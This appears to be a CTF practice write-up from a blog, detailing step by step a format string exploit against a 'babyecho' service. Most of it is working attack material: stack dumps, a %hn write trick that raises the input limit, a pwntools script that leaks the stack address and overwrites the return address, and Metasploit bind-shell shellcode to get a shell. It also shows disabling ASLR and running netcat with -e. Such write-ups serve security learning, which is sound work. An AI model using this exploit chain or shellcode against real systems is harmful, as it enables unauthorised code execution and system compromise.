Being a visual guy (and missing Olly...), I use EDB to put a few breakpoints and see the stack layout after a few format string injections.
It seems that our input is located at 0xbffff5ac, and that the format string "%08x %08x" retrieved the values 0000000d and 0000000a, which are directly below the pointer to the format string (as is usual with printf's). Playing around with various format strings, we notice that we can easily use direct parameter access-type format strings to get to the values that are on the stack. This is a short mapping of the stack and its parameters after our input is ingested (copied from EDB stack trace).
bfff:f584|080481a8|....|
bfff:f588|bffff9b8|....|
bfff:f58c|08049014|....|return to 08049014     (the return address!!!1!)
bfff:f590|bffff5ac|....|ASCII "AAAAAAA"
bfff:f594|0000000d|....|                       %1$x
bfff:f598|0000000a|....|                       %2$x
bfff:f59c|00000000|....|                       %3$x
bfff:f5a0|0000000d|....|                       %4$x (seems to be the 13 byte limitation)
bfff:f5a4|bffff5ac|....|ASCII "AAAAAAA"        %5$x
bfff:f5a8|00000000|....|                       %6$x
bfff:f5ac|41414141|AAAA|                       %7$x
bfff:f5b0|00414141|AAA.|
bfff:f5b4|00000000|....|

Having played around with this binary in a debugger, I noticed that the stack addresses changed constantly (because of ASLR). At this point during the exploit development, this is kind of annoying so I decided to turn it off.
echo 0 > /proc/sys/kernel/randomize_va_space

OK - the hard part seems to be over. We now know what the stack looks like and know where our input (payload) is located. Also, we can easily leak the location of our payload with %5$x, making it easy to subvert ASLR on the server (remember, just because we killed it locally does not mean we can hard-code the virtual addresses in our exploit!).
Knowing this, it is easy to overwrite the return address (in above example at 0xbffff58c) with the address of our payload.
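
Every other address we need follows from the leaked one. A minimal sketch, assuming the offsets read off the stack dump above (the return address 32 bytes and the 13 byte limit 12 bytes before the buffer); derive_addresses is a made-up helper name.

```python
def derive_addresses(leak_line):
    """Turn the reply to %5$x into the addresses used by the exploit."""
    buf = int(leak_line.strip(), 16)
    return {
        "buffer": buf,                  # start of our input on the stack
        "size_limit": buf - 12,         # the 13 byte limitation (%4$x)
        "return_address": buf - 32,     # slot holding "return to 08049014"
    }

# Example with the value from the dump above (ASLR disabled locally).
addrs = derive_addresses("bffff5ac\n")
```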

But wait - we can only write 13 bytes!!1! That's not enough space for a decent payload (at least not to my knowledge).

Luckily, we know that the 13 byte limitation parameter is located at %4$x. There is a dirty little trick we can use to change the value at %4$x (since it is below the format string pointer) just enough to make it possible to upload a decent payload/shellcode. I found this little trick reading through this tutorial.
\xdc\xf0\xff\xbf%7$hn
The format string above will overwrite two bytes at 0xbffff0dc (the address encoded in its first four bytes) with a small integer number.
With the "%7$" parameter we select the seventh argument of the format function directly, and offset 7$ is exactly where our format string (and therefore the address at its start) begins. What %hn actually does is write the number of bytes printed so far to that address as a 16-bit value (this is why we can only insert a small integer number). There is a neat little trick we can use to increase the number of bytes printed without making the format string itself much longer - %9u. So, our injection has to look something like this:
\xdc\xf0\xff\xbf%9u%7$hn
Because of the 13 byte restriction we only have 8 characters left to set the length, since %7$hn takes up 5 characters (and 4 of those 8 go to the address). Even with the %9u we won't get an integer higher than 13 (coincidence - probably not!). Obviously, it makes no sense to overwrite the low bytes at offset 4$ (0xbffff5a0 in above dump) since the value there is already as high as the largest number we can write (13). Thus, we have to write two bytes higher (e.g. at 0xbffff5a2) .. which is not really a big deal to achieve.
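
The effect of such a write can be modelled in a few lines. This is only a sketch: it assumes the padding directive prints exactly its width, and that the program clamps the limit to 0x3FF as seen in the disassembly. The exact number that ends up in the upper half depends on how many characters were actually printed in a given run.

```python
import struct

ADDR_LEN = 4   # the 4 address bytes at the start of the format string are printed too

def bytes_printed(pad_width):
    """Characters output before %hn: the address bytes plus the padded number."""
    return ADDR_LEN + pad_width

def limit_after_write(old_limit, written, byte_offset):
    """Value of the 32-bit limit after %hn stores `written` at limit + byte_offset."""
    raw = bytearray(struct.pack("<I", old_limit))
    raw[byte_offset:byte_offset + 2] = struct.pack("<H", written & 0xFFFF)
    return struct.unpack("<I", bytes(raw))[0]

written = bytes_printed(9)                         # "%9u" pads to 9 characters
low_write = limit_after_write(0x0d, written, 0)    # writing the low half changes nothing
high_write = limit_after_write(0x0d, written, 2)   # writing the high half makes it huge
effective = min(high_write, 0x3FF)                 # the program clamps to 1023
```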

Since any further steps depend on the actual leak, it makes no sense to try further format string injections by hand - we need to script! I use python as my tool of choice for most of my exploiting endeavors. There is a really nice library for python called pwn, which really helps in removing the boilerplate code from most exploit scripts. Hence, I will be using it for this challenge.

from pwn import *
conn = remote("localhost", 1234) # open connection to babyecho server
log.info(conn.recvuntil("\n"))   # get the first output 

conn.sendline("%5$x")            # inject format string to leak address
leak_str = conn.recvuntil("\n")  # read the reply from the same connection
leaked_buf_addr = int(leak_str, 16)

log.info("We got this address: %s" % hex(leaked_buf_addr))

For this to work locally, you obviously need to start your own local "babyecho server". I did it using netcat, like this:
nc -l -p 1234 -e ./babyecho_eb11fdf6e40236b1a37b7974c53b6c3d

Now that we have the address of the buffer on the stack, we can subtract 0xC (or 12) from it to get the address of the buffer size limitation. Then, we increase the address by 2 so that we are not writing to the first byte, but the third!
addr_of_limitation = leaked_buf_addr - 12     # subtract 0xC to get limitation address

addr_of_limitation = addr_of_limitation + 2   # don't write to the first byte 
                                              # because it will not be enough
conn.sendline(p32(addr_of_limitation)+"%9u%7$hn")   # the +2 was already applied above
conn.recvuntil("\n")

We confirm this by looking at the stack after running this script. Here is a before and after:
bfff:f590|bffff5ac|....|ASCII "AAAAAAA"
bfff:f594|0000000d|....|                       %1$x
bfff:f598|0000000a|....|                       %2$x
bfff:f59c|00000000|....|                       %3$x
bfff:f5a0|0000000d|....|                       %4$x ==> bfff:f0d0|0007000d|....|
bfff:f5a4|bffff5ac|....|ASCII "AAAAAAA"        %5$x

Hurray! Our input is now larger than 13 bytes!!1! Please note that even though we now have a huge limitation value, we still have a hard-coded limitation of 1023 bytes (as shown before). That should be enough for a decent shellcode :)

Side-note: perhaps it is useful to point out a neat trick in EDB, which lets you attach to a running binary. Here is how I tested the above exploit:
  1. Start babyecho using NetCat
  2. Attach EDB to the NC process (File -> Attach). It will probably be the last process in the list (named nc)
  3. Press run in EDB
  4. Execute the python exploit script above
  5. EDB catches the input to NC and starts executing babyecho, which allows us to set a breakpoint at 0x0804900f (right before we execute the injection and where we can see the stack layout)
  6. Verify stack layout and step over till you see the result :)
So far so good - we now need to force the program to execute our shellcode (which we do not have yet) by jumping to its location. Usually, when the payload is loaded on the stack it's bad luck because most processes have NX enabled. In that case one needs to play around with ROP. However, this is not one of those times since NX is not enabled! This means we can put our shellcode on the stack, and simply force the program to jump to that location. An obvious candidate would be the return address (0xbffff58c in above dump).
Now comes the somewhat tricky part - how do we write an arbitrary value to a location on the stack? The last trick won't work because it only enables us to write a short integer value. Well, turns out that there is actually a "magic formula" you can use to write any value to any location. I remember first seeing it in the book Gray Hat Hacking, but there is probably another instance of it out there.

First, we need to choose a value to write and an address to write it to! Then, the value we wish to write needs to be split in two values:
  • The first two, high-order, bytes (HOB)
  • The last two, lower-order, bytes (LOB)
The formula goes something like this:

                HOB < LOB                                   HOB > LOB
Addresses       [addr_to_write_to][addr_to_write_to + 2]    [addr_to_write_to][addr_to_write_to + 2]
Padding         %[HOB - 8]x                                 %[LOB - 8]x
First write     %[param_offset_on_stack + 1]$hn             %[param_offset_on_stack]$hn
Padding         %[LOB - HOB]x                               %[HOB - LOB]x
Second write    %[param_offset_on_stack]$hn                 %[param_offset_on_stack + 1]$hn

param_offset_on_stack - in this scenario is 7 (as explained in the first stack dump!).
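
The formula can be wrapped in a small helper. This is a sketch, not the version from the book: build_hn_write is a made-up name, it assumes the two addresses sit at the start of the format string (so 8 bytes are already printed), and it assumes the values consumed by the %x paddings are narrower than the padding widths.

```python
import struct

def build_hn_write(addr, value, first_offset=7, already_printed=8):
    """Format string that writes the 32-bit `value` to `addr` using two %hn writes."""
    lob = value & 0xFFFF            # low-order two bytes, written to addr
    hob = (value >> 16) & 0xFFFF    # high-order two bytes, written to addr + 2

    # addr is parameter `first_offset`, addr + 2 is parameter `first_offset + 1`.
    # The printed count only grows, so the smaller half must be written first.
    writes = sorted([(lob, first_offset), (hob, first_offset + 1)])

    payload = struct.pack("<I", addr) + struct.pack("<I", addr + 2)
    printed = already_printed
    for half, param in writes:
        if half < printed:
            raise ValueError("half-word is smaller than the bytes already printed")
        pad = half - printed
        if pad > 0:                 # skip the padding when nothing needs to be added
            payload += ("%" + str(pad) + "x").encode("ascii")
            printed += pad
        payload += ("%" + str(param) + "$hn").encode("ascii")
    return payload

# Example: point the return address at 0xbffff58c to 0xbffff0fc.
example = build_hn_write(0xbffff58c, 0xbffff0fc)
```

Sorting the two half-words covers both columns of the formula, and skipping a zero padding handles the case where both halves are equal.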

Now we need to choose the address to which we are going to write. Like I said earlier, we will leverage the return address location and redirect the flow of execution to our shellcode. So where is the return address? If you look at the previous stack dumps, you will see it right above the first parameter - which is 32 bytes above the leaked address.
As for the value to write (the address of our shellcode) - we could calculate it based on the table above.. but we could also just look at it live with EDB. To do this, I will extend the python script with the above formula (in the table) and use a dummy value (0xBBBBBBBB) to write to the return address. As for the payload, for now let's just send a bunch of A's and see where they land.
addr_to_write_to = leaked_buf_addr - 32    # location of the return address
value_to_write = 0xBBBBBBBB

hob = (value_to_write >> 16) & 0xFFFF      # high-order two bytes
lob = value_to_write & 0xFFFF              # low-order two bytes

payload = ""
payload += str(p32(addr_to_write_to)) + str(p32(addr_to_write_to+2))

# compare as integers (comparing hex strings can give the wrong answer)
# note: if hob == lob the second padding is "%0x", which still prints at least one character
if hob < lob:
 payload += "%" + str(hob-8) 
 payload += "x%8$hn" 
 payload += "%" + str(lob-hob)
 payload += "x%7$hn" 
else:
 payload += "%" + str(lob-8) 
 payload += "x%7$hn" 
 payload += "%" + str(hob-lob)
 payload += "x%8$hn" 

payload += "A" *100 

conn.sendline(payload)
conn.interactive()

As we can see in the screenshot below, the payload begins at 0xbffff0fc, which is 32 bytes from the leaked address. Now we can change the value_to_write accordingly to land where our payload is.

Now that everything is in place, we just need to add the right shellcode at the end of the payload, and we are done! Instead of writing one ourselves, we'll just use a shellcode from Metasploit. I used msfpayload to search for a bind shell for 32 bit Linux systems.
# msfpayload -l | grep linux | grep shell | grep 86
[!] ************************************************************************
[!] *               The utility msfpayload is deprecated!                  *
[!] *              It will be removed on or about 2015-06-08               *
[!] *                   Please use msfvenom instead                        *
[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *
[!] ************************************************************************
    linux/x86/shell/bind_ipv6_tcp                       Spawn a command shell (staged). Listen for a connection over IPv6
    linux/x86/shell/bind_nonx_tcp                       Spawn a command shell (staged). Listen for a connection
    linux/x86/shell/bind_tcp                            Spawn a command shell (staged). Listen for a connection
    linux/x86/shell/find_tag                            Spawn a command shell (staged). Use an established connection
    linux/x86/shell/reverse_ipv6_tcp                    Spawn a command shell (staged). Connect back to attacker over IPv6
    linux/x86/shell/reverse_nonx_tcp                    Spawn a command shell (staged). Connect back to the attacker
    linux/x86/shell/reverse_tcp                         Spawn a command shell (staged). Connect back to the attacker
    linux/x86/shell_bind_ipv6_tcp                       Listen for a connection over IPv6 and spawn a command shell
    linux/x86/shell_bind_tcp                            Listen for a connection and spawn a command shell
    linux/x86/shell_bind_tcp_random_port                
    linux/x86/shell_find_port                           Spawn a shell on an established connection
    linux/x86/shell_find_tag                            Spawn a shell on an established connection (proxy/nat safe)
    linux/x86/shell_reverse_tcp                         Connect back to attacker and spawn a command shell
    linux/x86/shell_reverse_tcp2                        Connect back to attacker and spawn a command shell


We have plenty to choose from! Since it's for a local user, I just picked a TCP bind shell.
# msfpayload linux/x86/shell/bind_tcp C

/*
 * linux/x86/shell/bind_tcp - 36 bytes (stage 2)
 * http://www.metasploit.com
 */
unsigned char buf[] = 
"\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b"
"\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x52\x53\x89\xe1\xcd\x80";

There we go - our shellcode. Now just paste it instead of the A's, and run the script - it will get you shell access on the host. All done!  :)
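
Before pasting the shellcode in place of the A's, it can be worth checking it for bytes that might break delivery. The sketch below is only an illustration: the name find_bad_bytes and the chosen set of "bad" bytes (NUL, newline and '%') are assumptions, based on the payload being sent as one line and then passed to printf. The real set depends on how the target reads its input.

```python
# The 36-byte stage shown above, as a Python bytes literal.
SHELLCODE = (
    b"\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b"
    b"\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
    b"\x52\x53\x89\xe1\xcd\x80"
)

def find_bad_bytes(data, bad=b"\x00\x0a\x25"):
    """Return (offset, byte) pairs for every byte of data found in bad.

    The default set is an assumption: NUL ends a C string, newline ends the
    line being sent, and '%' would be parsed by printf as a conversion.
    """
    bad_set = set(bytearray(bad))
    return [(i, b) for i, b in enumerate(bytearray(data)) if b in bad_set]

print(len(SHELLCODE))             # length of the shellcode in bytes
print(find_bad_bytes(SHELLCODE))  # an empty list means none of the assumed bad bytes occur
```

If the list is not empty, the shellcode would need to be encoded or replaced before appending it to the format string.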


Practice session write-up - disclaimer


CTF's are fun!!1!

While I enjoy playing CTFs and solving challenges, I often find that I don't get to try every challenge, and when I do, I usually just try to solve it as quickly and painlessly as possible to get the flag. So, in an attempt to improve my skills and play around with fun CTF challenges, I decided to start writing these blog posts to share what I learned and, possibly, get feedback from others on how to improve.

For lack of a better term, I will be calling these write-ups "Practice session write-up" in order to distinguish them from write-ups of the tasks that I have solved while participating in a CTF.